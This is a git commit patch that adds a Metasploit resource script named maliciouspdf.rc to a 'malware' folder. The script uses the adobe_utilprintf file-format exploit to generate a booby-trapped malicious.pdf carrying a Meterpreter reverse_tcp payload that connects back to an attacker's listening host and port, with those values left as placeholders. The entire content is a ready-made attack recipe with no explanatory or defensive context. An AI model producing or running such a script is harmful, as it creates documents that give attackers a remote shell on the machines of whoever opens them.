From 696111049388b5a8f51b02e331b24c6650d4799e Mon Sep 17 00:00:00 2001 From: jerome Date: Mon, 13 Nov 2023 01:34:03 +0100 Subject: commit initial --- malware/maliciouspdf.rc | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 malware/maliciouspdf.rc (limited to 'malware/maliciouspdf.rc') diff --git a/malware/maliciouspdf.rc b/malware/maliciouspdf.rc new file mode 100644 index 0000000..71c6c09 --- /dev/null +++ b/malware/maliciouspdf.rc @@ -0,0 +1,6 @@ +use exploit/windows/fileformat/adobe_utilprintf +set FILENAME malicious.pdf +set PAYLOAD windows/meterpreter/reverse_tcp +set LHOST listening_ip +set LPORT tcp_port +exploit -- cgit v1.2.3